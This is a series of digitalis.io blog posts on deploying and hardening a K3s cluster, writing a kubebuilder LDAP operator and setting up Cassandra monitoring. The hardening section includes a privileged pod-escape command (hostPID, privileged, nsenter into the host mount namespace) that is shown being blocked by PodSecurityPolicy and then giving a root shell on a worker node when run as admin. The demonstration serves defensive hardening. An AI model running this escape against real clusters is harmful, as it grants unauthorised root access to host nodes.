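A quick way to see whether a container actually received a token is to look for the file at the path mentioned above. This is a minimal sketch meant to be run from inside a pod; `service_account_token_present` is a hypothetical helper, and the `root` parameter exists only so the check can be exercised against a scratch directory.

```python
from pathlib import Path

# Path from the text above, relative to the filesystem root.
TOKEN_RELATIVE_PATH = "var/run/secrets/kubernetes.io/serviceaccount/token"


def service_account_token_present(root: str = "/") -> bool:
    """Return True if a non-empty service account token file exists under root."""
    token = Path(root) / TOKEN_RELATIVE_PATH
    try:
        return token.is_file() and token.stat().st_size > 0
    except OSError:
        return False
```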

To remediate we simply run

    - name: Fetch namespace names
      shell: |
        set -o pipefail
        {{ kubectl_cmd }} get namespaces -A | tail -n +2 | awk '{print $1}'
      changed_when: no
      register: namespaces

    # CIS - 5.1.5 - 5.1.6
    - name: Security - Ensure that default service accounts are not actively used
      command: |
        {{ kubectl_cmd }} patch serviceaccount default -n {{ item }} -p \
            'automountServiceAccountToken: false'
      register: kubectl
      changed_when: "'no change' not in kubectl.stdout"
      failed_when: "'no change' not in kubectl.stderr and kubectl.rc != 0"
      run_once: yes
      with_items: "{{ namespaces.stdout_lines }}"

Final Result

In the end the cluster will adhere to the following CIS ruling

- CIS – 1.1.1 to 1.1.21 — File Permissions

- CIS – 1.2.1 to 1.2.35 — API Server setup

- CIS – 1.3.1 to 1.3.7 — Controller Manager setup

- CIS – 1.4.1, 1.4.2 — Scheduler Setup

- CIS – 3.2.1 — Control Plane Setup

- CIS – 4.1.1 to 4.1.10 — Worker Node Setup

- CIS – 4.2.1 to 4.2.13 — Kubelet Setup

- CIS – 5.1.1 to 5.2.9 — RBAC and Pod Security Policies

- CIS – 5.7.1 to 5.7.4 — General Policies

So now we have a cluster that is also fully compliant with the CIS Benchmark for Kubernetes. Did this have any effect?

Let’s try our POD escaping again

    ~ $ kubectl-user apply -f demo/privileged-deploy.yaml
    deployment.apps/privileged-deploy created
    ~ $ kubectl-user get pods
    No resources found in unprivileged-user namespace.
    ~ $ kubectl-user get rs
    NAME                          DESIRED   CURRENT   READY   AGE
    privileged-deploy-8878b565b   1         0         0       108s
    ~ $ kubectl-user describe rs privileged-deploy-8878b565b | tail -n8
    Conditions:
      Type             Status  Reason
      ----             ------  ------
      ReplicaFailure   True    FailedCreate
    Events:
      Type     Reason        Age                   From                   Message
      ----     ------        ----                  ----                   -------
      Warning  FailedCreate  54s (x15 over 2m16s)  replicaset-controller  Error creating: pods "privileged-deploy-8878b565b-" is forbidden: PodSecurityPolicy: unable to admit pod: [spec.securityContext.hostNetwork: Invalid value: true: Host network is not allowed to be used spec.securityContext.hostPID: Invalid value: true: Host PID is not allowed to be used spec.containers[0].securityContext.privileged: Invalid value: true: Privileged containers are not allowed]

So the POD is not allowed, PSPs are working!

We can even try this command that will not create a Replica Set but directly a POD and attach to it.

~ $ kubectl-user run hostname-sudo --restart=Never -it --image overriden --overrides '

{

"spec": {

"hostPID": true,

"hostNetwork": true,

"containers": [

{

"name": "busybox",

"image": "alpine:3.7",

"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],

"stdin": true,

"tty": true,

"resources": {"requests": {"cpu": "10m"}},

"securityContext": {

"privileged": true

}

}

]

}

}' --rm --attach

The result will be:

Error from server (Forbidden): pods "hostname-sudo" is forbidden: PodSecurityPolicy: unable to admit pod: [spec.securityContext.hostNetwork: Invalid value: true: Host network is not allowed to be used spec.securityContext.hostPID: Invalid value: true: Host PID is not allowed to be used spec.containers[0].securityContext.privileged: Invalid value: true: Privileged containers are not allowed]

So we are now able to restrict unprivileged users from doing nasty stuff on our cluster.

What about the admin role? Does that command still work?

~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '

{

"spec": {

"hostPID": true,

"hostNetwork": true,

"containers": [

{

"name": "busybox",

"image": "alpine:3.7",

"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],

"stdin": true,

"tty": true,

"resources": {"requests": {"cpu": "10m"}},

"securityContext": {

"privileged": true

}

}

]

}

}' --rm --attach

If you don't see a command prompt, try pressing enter.

[root@worker01 /]#

Checkpoint

So we now have a hardened cluster from base OS to the application level, but as shown above some edge cases still make it insecure.

In the final part of this blog series we will analyse how to use Sysdig’s Falco security suite to cover even admin roles and RCEs inside PODs.

All the playbooks are available in the GitHub repo at https://github.com/digitalis-io/k3s-on-prem-production


The post K3s – lightweight kubernetes made ready for production – Part 2 appeared first on digitalis.io.

The post K3s – lightweight kubernetes made ready for production – Part 1 appeared first on digitalis.io.

- Part 1: Deploying K3s, network and host machine security configuration

- Part 2: K3s Securing the cluster

- Part 3: Creating a security responsive K3s cluster

This is part 1 of a three-part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. A fully working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.

If you would like to know more about how to implement modern data and cloud technologies, such as Kubernetes, into your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.

Introduction

There are many advantages to running an on-premises Kubernetes cluster: it can increase performance, lower costs, and SOMETIMES cause fewer headaches. It also allows users who are unable to utilize the public cloud to operate in a “cloud-like” environment. It does this by decoupling dependencies and abstracting infrastructure away from your application stack, giving you the portability and the scalability that’s associated with cloud-native applications.

There are obvious downsides to running your kubernetes cluster on-premises, as it’s up to you to manage a series of complexities like:

- Etcd

- Load Balancers

- High Availability

- Networking

- Persistent Storage

- Internal Certificate rotation and distribution

And added to this there is the inherent complexity of running such a large orchestration application, so running:

- kube-apiserver

- kube-proxy

- kube-scheduler

- kube-controller-manager

- kubelet

And ensuring that all of these components are correctly configured, talk to each other securely (TLS) and reliably.

But is there a simpler solution to this?

Introducing K3s



K3s is a fully CNCF (Cloud Native Computing Foundation) certified, compliant Kubernetes distribution by SUSE (formerly Rancher Labs) that is easy to use and focused on being lightweight.

To achieve that it is designed to be a single binary of about 45MB that completely implements the Kubernetes APIs. To keep it light, a lot of extra drivers that are not strictly part of the core were removed, but they are still easily replaceable with external add-ons.

So why choose K3s instead of full K8s?

Being a single binary it’s easy to install and bring up and it internally manages a lot of pain points of K8s like:

- Internally managed Etcd cluster

- Internally managed TLS communications

- Internally managed certificate rotation and distribution

- Integrated storage provider (localpath-provisioner)

- Low dependency on base operating system

So K3s doesn’t even need a lot of stuff on the base host, just a recent kernel and `cgroups`.

All of the other utilities are packaged internally like:

This leads to really low system requirements: a worker node needs just 512MB of RAM.

Image Source: https://k3s.io/

K3s is a fully encapsulated binary that will run all the components in the same process. One of the key differences from full kubernetes is that, thanks to KINE, it supports not only Etcd to hold the cluster state, but also SQLite (for single-node, simpler setups) or external DBs like MySQL and PostgreSQL (have a look at this blog or this blog on deploying PostgreSQL for HA and service discovery)

The following setup will be performed on pretty small nodes:

- 6 Nodes

- 3 Master nodes

- 3 Worker nodes

- 2 Core per node

- 2 GB RAM per node

- 50 GB Disk per node

- CentOS 8.3

What do we need to create a production-ready cluster?

We need to have a Highly Available, resilient, load-balanced and Secure cluster to work with. So without further ado, let’s get started with the base underneath, the Nodes. The following 3 part blog series is a detailed walkthrough on how to set up the k3s kubernetes cluster, with some snippets taken from the project’s Github repo: https://github.com/digitalis-io/k3s-on-prem-production



Secure the nodes

Network

First things first, we need to design a sound network layout for the nodes in the cluster. This will be split in two, EXTERNAL and INTERNAL networks.

- The INTERNAL network is only accessible from within the cluster, and the Flannel network (using VXLAN) is built on top of it.

- The EXTERNAL network is used exclusively for serving traffic. It exposes only ports 80 and 443, plus 6443 for the K8s APIs (the latter could even be skipped).

This ensures that internal cluster-components communication is segregated from the rest of the network.

Firewalld

Another crucial piece of setup is firewalld. The first thing is to ensure that firewalld uses the iptables backend rather than the nftables one, as the latter is still incompatible with Kubernetes. This is done in the Ansible project like this:

- name: Set firewalld backend to iptables

replace:

path: /etc/firewalld/firewalld.conf

regexp: FirewallBackend=nftables$

replace: FirewallBackend=iptables

backup: yes

register: firewalld_backend

This will require a reboot of the machine.

Also we will need to set up zoning for the internal and external interfaces, and set the respective open ports and services.

Internal Zone

For the internal network we want to open all the necessary ports for kubernetes to function:

- 2379/tcp # etcd client requests

- 2380/tcp # etcd peer communication

- 6443/tcp # K8s api

- 7946/udp # MetalLB speaker port

- 7946/tcp # MetalLB speaker port

- 8472/udp # Flannel VXLAN overlay networking

- 9099/tcp # Flannel livenessProbe/readinessProbe

- 10250-10255/tcp # kubelet APIs + Ingress controller livenessProbe/readinessProbe

- 30000-32767/tcp # NodePort port range

- 30000-32767/udp # NodePort port range

We also want rich rules to ensure that the POD network is whitelisted. This should be the final result:

internal (active)

target: default

icmp-block-inversion: no

interfaces: eth0

sources:

services: cockpit dhcpv6-client mdns samba-client ssh

ports: 2379/tcp 2380/tcp 6443/tcp 80/tcp 443/tcp 7946/udp 7946/tcp 8472/udp 9099/tcp 10250-10255/tcp 30000-32767/tcp 30000-32767/udp

protocols:

masquerade: yes

forward-ports:

source-ports:

icmp-blocks:

rich rules:

rule family="ipv4" source address="10.43.0.0/16" accept

rule family="ipv4" source address="10.44.0.0/16" accept

rule protocol value="vrrp" accept

External Zone

For the external network we only want ports 80 and 443 and (only if needed) 6443 for the K8s APIs.

The final result should look like this

public (active)

target: default

icmp-block-inversion: no

interfaces: eth1

sources:

services: dhcpv6-client

ports: 80/tcp 443/tcp 6443/tcp

protocols:

masquerade: yes

forward-ports:

source-ports:

icmp-blocks:

rich rules:

Selinux

Another important point is that SELinux should be embraced, not deactivated! The smart folks at SUSE Rancher provide the rules needed to make K3s work with SELinux in enforcing mode. Just install them!

# Workaround to the RPM/YUM hardening

# being the GPG key enforced at rpm level, we cannot use

# the dnf or yum module of ansible

- name: Install SELINUX Policies # noqa command-instead-of-module

command: |

rpm --define '_pkgverify_level digest' -i {{ k3s_selinux_rpm }}

register: rpm_install

changed_when: "rpm_install.rc == 0"

failed_when: "'already installed' not in rpm_install.stderr and rpm_install.rc != 0"

when:

- "'libselinux' in ansible_facts.packages"

This assumes that SELinux is installed (RedHat/CentOS base). If it is not present, the playbook will skip all SELinux configuration and references.

Node Hardening

To be intrinsically secure, a network environment must be properly designed and configured. This is where the Center for Internet Security (CIS) benchmarks come in. CIS benchmarks are a set of configuration standards and best practices designed to help organizations ‘harden’ the security of their digital assets. They map directly to many major standards and regulatory frameworks, including NIST CSF, ISO 27000, PCI DSS, HIPAA, and more. Hardening can be further enhanced by adopting the Security Technical Implementation Guide (STIG).

All CIS benchmarks are freely available as PDF downloads from the CIS website.

The project repo includes an Ansible hardening role which applies the CIS benchmark to the base OS of the node. Alternatively, there are ready-to-use roles that we recommend running against your nodes, such as:

https://github.com/ansible-lockdown/RHEL8-STIG/

https://github.com/ansible-lockdown/RHEL8-CIS/

Having a correctly configured and secure operating system underneath kubernetes is surely the first step to a more secure cluster.

Installing K3s

We’re going to set up a HA installation using the Embedded ETCD included in K3s.
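A quick note on why three masters are used: embedded etcd is built on Raft consensus, which only accepts writes while a strict majority of members is reachable. The sketch below works through that arithmetic. The function names `quorum` and `faultTolerance` are illustrative only and are not part of K3s or etcd.

```go
package main

import "fmt"

// quorum returns how many members must agree for a Raft-based store such
// as etcd to accept writes: a strict majority of the cluster.
func quorum(members int) int {
	return members/2 + 1
}

// faultTolerance returns how many members can be lost while the remaining
// ones still form a quorum.
func faultTolerance(members int) int {
	if members < 1 {
		return 0
	}
	return members - quorum(members)
}

func main() {
	for _, n := range []int{1, 2, 3, 5} {
		fmt.Printf("masters=%d quorum=%d tolerated failures=%d\n",
			n, quorum(n), faultTolerance(n))
	}
}
```

With three masters the quorum is two, so the cluster survives the loss of one master. Two masters tolerate no failures at all, which is why an odd number of at least three is the usual choice.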

Bootstrapping the Masters

Getting started is dead simple: we first run the K3s server command on the first node like this

K3S_TOKEN=SECRET k3s server --cluster-init

Then, on the other master nodes, we join the first one:

K3S_TOKEN=SECRET k3s server --server https://<ip or hostname of server1>:6443

How does it translate to Ansible?

We just set up the first service, and subsequently the others

- name: Prepare cluster - master 0 service

template:

src: k3s-bootstrap-first.service.j2

dest: /etc/systemd/system/k3s-bootstrap.service

mode: 0400

owner: root

group: root

when: ansible_hostname == groups['kube_master'][0]

- name: Prepare cluster - other masters service

template:

src: k3s-bootstrap-followers.service.j2

dest: /etc/systemd/system/k3s-bootstrap.service

mode: 0400

owner: root

group: root

when: ansible_hostname != groups['kube_master'][0]

- name: Start K3s service bootstrap /1

systemd:

name: k3s-bootstrap

daemon_reload: yes

enabled: no

state: started

delay: 3

register: result

retries: 3

until: result is not failed

when: ansible_hostname == groups['kube_master'][0]

- name: Wait for service to start

pause:

seconds: 5

run_once: yes

- name: Start K3s service bootstrap /2

systemd:

name: k3s-bootstrap

daemon_reload: yes

enabled: no

state: started

delay: 3

register: result

retries: 3

until: result is not failed

when: ansible_hostname != groups['kube_master'][0]

After that we will be presented with a working 3 node cluster. Here is the expected output:

NAME STATUS ROLES AGE VERSION

master01 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1

master02 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1

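master03 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1

Once the cluster is formed, the bootstrap service is stopped and replaced by the regular K3s server service:

- name: Stop K3s service bootstrap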

systemd:

name: k3s-bootstrap

daemon_reload: no

enabled: no

state: stopped

- name: Remove K3s service bootstrap

file:

path: /etc/systemd/system/k3s-bootstrap.service

state: absent

- name: Deploy K3s master service

template:

src: k3s-server.service.j2

dest: /etc/systemd/system/k3s-server.service

mode: 0400

owner: root

group: root

- name: Enable and check K3s service

systemd:

name: k3s-server

daemon_reload: yes

enabled: yes

state: started

High Availability Masters

Another point is to have the masters in HA, so that APIs are always reachable. To do this we will use keepalived, setting up a VIP (Virtual IP) inside the Internal network.

We will need to set up the firewalld rich rule in the internal Zone to allow VRRP traffic, which is the protocol used by keepalived to communicate with the other nodes and elect the VIP holder.

- name: Install keepalived

package:

name: keepalived

state: present

- name: Add firewalld rich rules /vrrp

firewalld:

rich_rule: rule protocol value="vrrp" accept

permanent: yes

immediate: yes

state: enabled

The complete task is available in: roles/k3s-deploy/tasks/cluster_keepalived.yml

vrrp_instance VI_1 {

state BACKUP

interface {{ keepalived_interface }}

virtual_router_id {{ keepalived_routerid | default('50') }}

priority {{ keepalived_priority | default('50') }}

...

Joining the workers

Now it’s time for the workers to join! It’s as simple as launching the command, following the task in roles/k3s-deploy/tasks/cluster_agent.yml

K3S_TOKEN=SECRET k3s agent --server https://<Keepalived VIP>:6443

- name: Deploy K3s worker service

template:

src: k3s-agent.service.j2

dest: /etc/systemd/system/k3s-agent.service

mode: 0400

owner: root

group: root

- name: Enable and check K3s service

systemd:

name: k3s-agent

daemon_reload: yes

enabled: yes

state: restarted

NAME STATUS ROLES AGE VERSION

master01 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1

master02 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1

master03 Ready control-plane,etcd,master 2d16h v1.20.5+k3s1

worker01 Ready <none> 2d16h v1.20.5+k3s1

worker02 Ready <none> 2d16h v1.20.5+k3s1

worker03 Ready <none> 2d16h v1.20.5+k3s1

Base service flags

--selinux

--disable traefik

--disable servicelb

Traefik and servicelb are disabled, as we will be using ingress-nginx and MetalLB respectively.

And set it up so that it uses the internal network

--advertise-address {{ ansible_host }} \

--bind-address 0.0.0.0 \

--node-ip {{ ansible_host }} \

--cluster-cidr={{ cluster_cidr }} \

--service-cidr={{ service_cidr }} \

--tls-san {{ ansible_host }}

Ingress and LoadBalancer

The cluster is up and running, now we need a way to use it! We have disabled traefik and servicelb previously to accommodate ingress-nginx and MetalLB.

MetalLB will be configured using layer2 and with two classes of IPs

apiVersion: v1

kind: ConfigMap

metadata:

namespace: metallb-system

name: config

data:

config: |

address-pools:

- name: default

protocol: layer2

addresses:

- {{ metallb_external_ip_range }}

- name: metallb_internal_ip_range

protocol: layer2

addresses:

- {{ metallb_internal_ip_range }}

So we will have space for two ingresses, an internal one and an external one. The deploy files are included in the playbook. The internal ingress exposes services useful for the cluster or monitoring, while the external one serves applications to the outside world.

We can then simply deploy our ingresses for our services selecting the kubernetes.io/ingress.class

For example, an internal ingress:

apiVersion: networking.k8s.io/v1

kind: Ingress

metadata:

name: dashboard-ingress

namespace: kubernetes-dashboard

annotations:

kubernetes.io/ingress.class: "internal-ingress-nginx"

nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"

spec:

rules:

- host: dashboard.192.168.122.200.nip.io

http:

paths:

- path: /

pathType: Prefix

backend:

service:

name: kubernetes-dashboard

port:

number: 443

And an external one:

apiVersion: networking.k8s.io/v1

kind: Ingress

metadata:

name: my-ingress

namespace: my-service

annotations:

kubernetes.io/ingress.class: "ingress-nginx"

nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"

spec:

rules:

- host: my-service.192.168.1.200.nip.io

http:

paths:

- path: /

pathType: Prefix

backend:

service:

name: my-service

port:

number: 443

Checkpoint

Mem: total used free shared buff/cache available CPU%

master01 1.8Gi 944Mi 112Mi 20Mi 762Mi 852Mi 3.52%

master02 1.8Gi 963Mi 106Mi 20Mi 748Mi 828Mi 3.45%

master03 1.8Gi 936Mi 119Mi 20Mi 763Mi 880Mi 3.68%

worker01 1.8Gi 821Mi 119Mi 11Mi 877Mi 874Mi 1.78%

worker02 1.8Gi 832Mi 108Mi 11Mi 867Mi 884Mi 1.45%

worker03 1.8Gi 821Mi 119Mi 11Mi 857Mi 894Mi 1.67%

Good! We now have a basic HA K3s cluster on our machines, and look at that resource usage! In just 1GB of RAM per node, we have a working kubernetes cluster.

But is it ready for production?

Not yet. We now need to secure the cluster and its services before continuing!

In the next blog we will analyse how this cluster is still vulnerable to some types of attack and which best practices and remediations we will adopt to prevent them.

Remember – all of the Ansible playbooks for deploying everything are available for you to check out on GitHub at https://github.com/digitalis-io/k3s-on-prem-production


The post Digitalis becomes a SUSE Gold Partner specialising in Rancher and Kubernetes appeared first on digitalis.io.

Digitalis is happy to announce we are now a SUSE Gold Partner providing services on the SUSE Rancher Kubernetes products. If you want to use Kubernetes in the cloud, on-premises or hybrid – Digitalis is here to help.

We can be your partner in leveraging the SUSE Rancher Kubernetes product capabilities. We pride ourselves in excelling in building, deploying and scaling modern applications in Kubernetes and the Cloud, to support your company in embracing innovations, improving speed and agility while retaining autonomy, good governance and mitigating cloud vendor lock in.

The SUSE Rancher products provide a comprehensive suite of tools and products to deploy, manage and secure your Kubernetes deployments across all CNCF certified Kubernetes deployments – from core to cloud to edge.

This partnership builds upon our extensive experience in Kubernetes, cloud native and distributed systems, data and development.

If you would like to know more about how to implement modern data and cloud native technologies, such as Kubernetes, in your business, we at Digitalis do it all: from Kubernetes and Cloud migration to fully managed services – we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, Cloud, Data, and DevOps. Contact us today for more information or learn more about each of our services here.


The post Kubernetes Operators pros and cons – the good, the bad and the ugly appeared first on digitalis.io.

What is it?

When you use Kubernetes to deploy an application, say a Deployment, you are calling the underlying Kubernetes API which hands over your request to an application and applies the config as you requested via the Yaml configuration file.

apiVersion: apps/v1

kind: Deployment

metadata:

name: nginx-deployment

labels:

app: nginx

spec:

[...]

In this example, Deployment is part of the default K8s server, but there are many other kinds you are probably using that are not built in and that you installed beforehand. For example, if you use an nginx ingress controller on your server you are installing an API (kind: Ingress) to modify the behaviour of nginx every time you configure a new web entry point.

The role of the controller is to track a resource type until it achieves the desired state. For example, another built-in controller is the Pod kind. The controller will loop over itself ensuring the Pod reaches the Running state by starting the containers configured in it. It will usually accomplish the task by calling an API server.



We can find three important parts of any controller:

- The application itself is a docker container running inside your Kubernetes which loops itself continuously checking and ensuring the end state of the resources you are deploying

- A Custom Resource Definition (CRD) which describes the yaml/json config file required to invoke this controller.

- Usually you will also have an API server doing the work in the background
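The control loop described above can be pictured with a few lines of plain Go. This is a conceptual sketch only: the `State` type and `reconcile` function are hypothetical stand-ins and do not use the real Kubernetes or controller-runtime APIs.

```go
package main

import "fmt"

// State is a hypothetical, simplified view of a resource: how many
// replicas of something exist.
type State struct {
	Replicas int
}

// reconcile compares the desired state with the actual one and performs a
// single corrective step. It returns true once the two states match.
func reconcile(desired State, actual *State) bool {
	switch {
	case actual.Replicas < desired.Replicas:
		actual.Replicas++ // stand-in for "start one more container"
	case actual.Replicas > desired.Replicas:
		actual.Replicas-- // stand-in for "stop one container"
	}
	return actual.Replicas == desired.Replicas
}

func main() {
	desired := State{Replicas: 3}
	actual := &State{Replicas: 0}

	// A real controller is triggered by events and requeues itself; a
	// bounded loop is enough to show convergence here.
	for i := 0; i < 10; i++ {
		done := reconcile(desired, actual)
		fmt.Printf("step %d: actual=%d desired=%d\n", i, actual.Replicas, desired.Replicas)
		if done {
			break
		}
	}
}
```

The important property is that each pass only looks at the difference between desired and actual state, so the same function can be called again at any time without harm.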

The good, the bad and the ugly

The good

Kubernetes Operators offer a way to extend the functionality of Kubernetes beyond its basics. This is especially interesting for complex applications which require intrinsic knowledge of the functionality of the application to be installed. We saw a good example earlier with the Ingress controller. Others are databases and stateful applications.

It can also reduce the complexity and length of the configuration. If you look for example at the postgres operator by Zalando you can see that with only a few lines you can spin up a fully featured cluster

apiVersion: "acid.zalan.do/v1"

kind: postgresql

metadata:

name: acid-minimal-cluster

namespace: default

spec:

teamId: "acid"

volume:

size: 1Gi

numberOfInstances: 2

users:

zalando: # database owner

- superuser

- createdb

foo_user: [] # role for application foo

databases:

foo: zalando # dbname: owner

preparedDatabases:

bar: {}

postgresql:

version: "13"

The bad

The ugly

The worst thing in my opinion is that it can lead to abuse and overuse.

You should only use an operator if the functionality cannot be provided by Kubernetes. K8s operators are not a way of packaging applications, they are extensions to Kubernetes. I often see community K8s Operator projects that I would happily replace with a helm chart, which in most cases is a much better option.

Hacking it

apiVersion: apiextensions.k8s.io/v1

kind: CustomResourceDefinition

metadata:

# name must match the spec fields below, and be in the form: <plural>.<group>

name: crontabs.stable.example.com

spec:

# group name to use for REST API: /apis/<group>/<version>

group: stable.example.com

# list of versions supported by this CustomResourceDefinition

versions:

- name: v1

# Each version can be enabled/disabled by Served flag.

served: true

# One and only one version must be marked as the storage version.

storage: true

schema:

openAPIV3Schema:

type: object

properties:

spec:

type: object

properties:

cronSpec:

type: string

image:

type: string

replicas:

type: integer

# either Namespaced or Cluster

scope: Namespaced

names:

# plural name to be used in the URL: /apis/<group>/<version>/<plural>

plural: crontabs

# singular name to be used as an alias on the CLI and for display

singular: crontab

# kind is normally the CamelCased singular type. Your resource manifests use this.

kind: CronTab

# shortNames allow shorter string to match your resource on the CLI

shortNames:

- ct

The good news is you may never have to. Enter kubebuilder. Kubebuilder is a framework for building Kubernetes APIs. I guess it is not dissimilar to Ruby on Rails, Django or Spring.



I took it out for a test and created my first API and controller 🎉

I have Kubernetes running on my laptop with minikube. There I installed OpenLDAP and I got to work to see if I could manage the LDAP users and groups from Kubernetes.

Start project

For my project I need to create two APIs, one for managing users and another for groups. Let’s initialise the project and create the APIs:

kubebuilder init --domain digitalis.io --license apache2 --owner "Digitalis.IO"

kubebuilder create api --group ldap --version v1 --kind LdapUser

kubebuilder create api --group ldap --version v1 --kind LdapGroup

These commands create everything I need to get started. Have a good look at the directory tree, from which I would highlight these three folders:

- api: it contains a subdirectory for each of the API versions you are writing code for. In our example you should only see v1

- config: all the yaml files required to set up the controller when installing in Kubernetes, chief among them the CRD.

- controller: the main part where you write the code to Reconcile

The next part is to define the API. With kubebuilder, rather than editing the CRD manually, you just add your Go types and kubebuilder generates the CRD for you.

If you look into the api/v1 directory you’ll find the resource type definitions for users and groups:

type LdapUserSpec struct {

Username string `json:"username"`

UID string `json:"uid"`

GID string `json:"gid"`

Password string `json:"password"`

Homedir string `json:"homedir,omitempty"`

Shell string `json:"shell,omitempty"`

}

For example, I have defined my users with this struct and the groups with:

type LdapGroupSpec struct {

Name string `json:"name"`

GID string `json:"gid"`

Members []string `json:"members,omitempty"`

}

Once you have your resources defined just run make install and it will generate and install the CRD into your Kubernetes cluster.
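The `json` struct tags in these specs decide how each field is named when the object is serialised, and `omitempty` drops a field that has no value. A minimal sketch using only the standard library and the LdapGroupSpec shown above; the `encode` helper is hypothetical and only there for illustration:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// LdapGroupSpec mirrors the struct from the post.
type LdapGroupSpec struct {
	Name    string   `json:"name"`
	GID     string   `json:"gid"`
	Members []string `json:"members,omitempty"`
}

// encode serialises a spec to JSON following its struct tags.
func encode(spec LdapGroupSpec) (string, error) {
	b, err := json.Marshal(spec)
	if err != nil {
		return "", err
	}
	return string(b), nil
}

func main() {
	withMembers, err := encode(LdapGroupSpec{Name: "devops", GID: "1000", Members: []string{"user01"}})
	if err != nil {
		panic(err)
	}
	noMembers, err := encode(LdapGroupSpec{Name: "devops", GID: "1000"})
	if err != nil {
		panic(err)
	}
	fmt.Println(withMembers) // members is present
	fmt.Println(noMembers)   // members is omitted entirely
}
```

This is why the manifests further down use lower-case keys such as `gid` and `members` even though the Go fields are capitalised.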

The truth is kubebuilder does an excellent job. After defining my API I just needed to update the Reconcile functions with my code and voila. This function is called every time an object (user or group in our case) is added, removed or updated. I’m not ashamed to say it took me probably 3 times longer to write up the code to talk to the LDAP server.

func (r *LdapGroupReconciler) Reconcile(req ctrl.Request) (ctrl.Result, error) {

ctx := context.Background()

log := r.Log.WithValues("ldapgroup", req.NamespacedName)

[...]

}

My only complication was with deleting. In my first version the controller was crashing because it could not find the object to delete, and without that I could not delete the user/group from LDAP. I found the answer in finalizers.

A finalizer is added to a resource and it acts like a pre-delete hook. This way the code captures that the user has requested the user/group to be deleted and it can then do the deed and reply back saying all good, move along. Below is the relevant code adapted from the kubebuilder book with extra comments:

//! [finalizer]

ldapuserFinalizerName := "ldap.digitalis.io/finalizer"

// Am I being deleted?

if ldapuser.ObjectMeta.DeletionTimestamp.IsZero() {

// No: check if I have the `finalizer` installed and install otherwise

if !containsString(ldapuser.GetFinalizers(), ldapuserFinalizerName) {

ldapuser.SetFinalizers(append(ldapuser.GetFinalizers(), ldapuserFinalizerName))

if err := r.Update(context.Background(), &ldapuser); err != nil {

return ctrl.Result{}, err

}

}

} else {

// The object is being deleted

if containsString(ldapuser.GetFinalizers(), ldapuserFinalizerName) {

// our finalizer is present, let's delete the user

if err := ld.LdapDeleteUser(ldapuser.Spec); err != nil {

log.Error(err, "Error deleting from LDAP")

return ctrl.Result{}, err

}

// remove our finalizer from the list and update it.

ldapuser.SetFinalizers(removeString(ldapuser.GetFinalizers(), ldapuserFinalizerName))

if err := r.Update(context.Background(), &ldapuser); err != nil {

return ctrl.Result{}, err

}

}

// Stop reconciliation as the item is being deleted

return ctrl.Result{}, nil

}

//! [finalizer]

Test Code

I created some test code. It’s very messy, remember this is just a learning exercise and it’ll break apart if you try to use it. There are also lots of duplications in the LDAP functions but it serves a purpose.

You can find it here: https://github.com/digitalis-io/ldap-accounts-controller
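The finalizer snippet shown earlier calls two helpers, containsString and removeString, that it does not define. Finalizers are stored as a plain list of strings on the object, so both helpers are simple slice operations. The version below is an illustrative sketch, not copied from the repository, and the "example.com/other" finalizer is a made-up value.

```go
package main

import "fmt"

// containsString reports whether s is present in slice.
func containsString(slice []string, s string) bool {
	for _, item := range slice {
		if item == s {
			return true
		}
	}
	return false
}

// removeString returns a new slice with every occurrence of s removed,
// leaving the input slice untouched.
func removeString(slice []string, s string) []string {
	result := make([]string, 0, len(slice))
	for _, item := range slice {
		if item != s {
			result = append(result, item)
		}
	}
	return result
}

func main() {
	const name = "ldap.digitalis.io/finalizer"
	// "example.com/other" is a hypothetical finalizer owned by someone else.
	finalizers := []string{"example.com/other", name}

	fmt.Println("has finalizer:", containsString(finalizers, name))
	finalizers = removeString(finalizers, name)
	fmt.Println("after removal:", finalizers)
}
```

Returning a fresh slice from removeString avoids modifying the list held by the object until the result is passed back through SetFinalizers.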

This controller talks to an LDAP server to create users and groups as defined in my CRDs. As you can see below, I now have two Kinds defined, one for LDAP users and one for LDAP groups. Because they are registered in Kubernetes through the CRDs, Kubernetes knows to hand them to our controller.

apiVersion: ldap.digitalis.io/v1

kind: LdapUser

metadata:

name: user01

spec:

username: user01

password: myPassword!

gid: "1000"

uid: "1000"

homedir: /home/user01

shell: /bin/bash

apiVersion: ldap.digitalis.io/v1

kind: LdapGroup

metadata:

name: devops

spec:

name: devops

gid: "1000"

members:

- user01

- "90000"

LDAP_BASE_DN="dc=digitalis,dc=io"

LDAP_BIND="cn=admin,dc=digitalis,dc=io"

LDAP_PASSWORD=xxxx

LDAP_HOSTNAME=ldap_server_ip_or_host

LDAP_PORT=389

LDAP_TLS="false"

make install run

Demo


]]>The post Cassandra with AxonOps on Kubernetes appeared first on digitalis.io.

]]>Introduction

The following shows how to install AxonOps for monitoring Cassandra. This process specifically requires the official cassandra helm repository.

Using minikube

The deployment should work fine on recent versions of minikube, as long as you give it enough memory.

minikube start --memory 8192 --cpus=4
minikube addons enable storage-provisioner

⚠️ Make sure you use a recent version of minikube. Also check the available drivers and select the most appropriate one for your platform.

Helmfile

Overview

As this deployment contains multiple applications we recommend you use an automation system such as Ansible or Helmfile to put together the config. The example below uses helmfile.

Install requirements

You need to install the following components:

- helm
- helmfile

Alternatively, you can use a dockerized version of both, such as https://hub.docker.com/r/chatwork/helmfile

Config files

The values below are set for running on a laptop with minikube; adjust them accordingly for larger deployments.
